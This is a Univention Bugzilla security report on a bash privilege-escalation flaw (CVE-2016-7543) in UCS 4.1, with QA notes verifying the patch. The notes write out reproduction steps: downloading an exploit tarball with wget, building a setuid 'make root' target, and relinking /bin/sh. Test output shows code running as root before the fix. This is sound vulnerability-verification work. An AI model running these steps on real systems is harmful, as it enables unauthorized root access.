Univention Bugzilla – Full Text Bug Listing |
Summary: | bash: Multiple issues (4.1) | ||
---|---|---|---|
Product: | UCS | Reporter: | Arvid Requate <requate> |
Component: | Security updates | Assignee: | Arvid Requate <requate> |
Status: | CLOSED FIXED | QA Contact: | Florian Best <best> |
Severity: | normal | ||
Priority: | P5 | CC: | best |
Version: | UCS 4.1 | Flags: | requate:
Patch_Available+
|
Target Milestone: | UCS 4.1-4-errata | ||
Hardware: | Other | ||
OS: | Linux | ||
What kind of report is it?: | Security Issue | What type of bug is this?: | --- |
Who will be affected by this bug?: | --- | How will those affected feel about the bug?: | --- |
User Pain: | Enterprise Customer affected?: | ||
School Customer affected?: | ISV affected?: | ||
Waiting Support: | Flags outvoted (downgraded) after PO Review: | ||
Ticket number: | Bug group (optional): | ||
Max CVSS v3 score: | |||
Attachments: | exploit.tar.gz |
Description
Arvid Requate
2016-11-08 11:55:45 CET
/usr/lib/vmware/bin/vmware-vmx-stats /usr/lib/vmware/bin/vmware-vmx-debug /usr/lib/vmware/bin/vmware-vmx /usr/bin/vmware-mount /usr/sbin/vmware-authd /sbin/mount.cifs To show the infected binaries: find / -perm -4000 -type f -exec sh -c 'objdump -T {} | egrep -q "\<popen|system\>"' \; -fprint /dev/stdout OK: *** 4.2+dfsg-0.1.51.201611101755 0 500 http://omar.knut.univention.de/build2/ ucs_4.1-0-errata4.1-4/amd64/ Packages OK: zgrep CVE-2016-7543 /usr/share/doc/bash/changelog.Debian.gz OK: YAML OK: bash still works I could not reproduce it with this exploit: http://seclists.org/oss-sec/2016/q3/617 Created attachment 8255 [details] exploit.tar.gz OK: reproduce # cd /tmp/ # wget http://apt.inguza.net/wheezy-security/bash/exploit.tar.gz # tar xvzf exploit.tar.gz # make # make root # ln -sf bash /bin/sh # su Administrator bash $ cd /tmp/; make test Test 1 uid=0(root) gid=5000(Domain Admins) groups=0(root),1005(Windows Hosts),5000(Domain Admins),5001(Dom/bin/date Tue Nov 29 19:17:07 CET 2016 Test 2 uid=33(www-data) gid=5000(Domain Admins) groups=33(www-data),1005(Windows Hosts),5000(Domain Admins/bin/date Tue Nov 29 19:17:07 CET 2016 Test 3 uid=2002(Administrator) gid=5000(Domain Admins) groups=5000(Domain Admins),1005(Windows Hosts),5001/bin/date ~OK: fixed version: ls -l exploit1 exploit2 exploit3 -rwsr-xr-x 1 root root 6920 Nov 29 19:12 exploit1 -rwsr-xr-x 1 root root 6920 Nov 29 19:12 exploit2 -rwxr-xr-x 1 www-data root 6804 Nov 29 19:12 exploit3 ./test.sh Test 1 + /bin/date Tue Nov 29 19:27:31 CET 2016 Test 2 uid=33(www-data) gid=5000(Domain Admins) groups=33(www-data),1005(Windows Hosts),5000(Domain Admins/bin/date Tue Nov 29 19:27:31 CET 2016 Test 3 uid=2002(Administrator) gid=5000(Domain Admins) groups=5000(Domain Admins),1005(Windows Hosts),5001/bin/date Tue Nov 29 19:27:31 CET 2016 I still think that it is wrong that the code is executed in Test 2 and Test 3. In "Test 2" the code is executed as www-data. But well, the most critical thing is fixed. |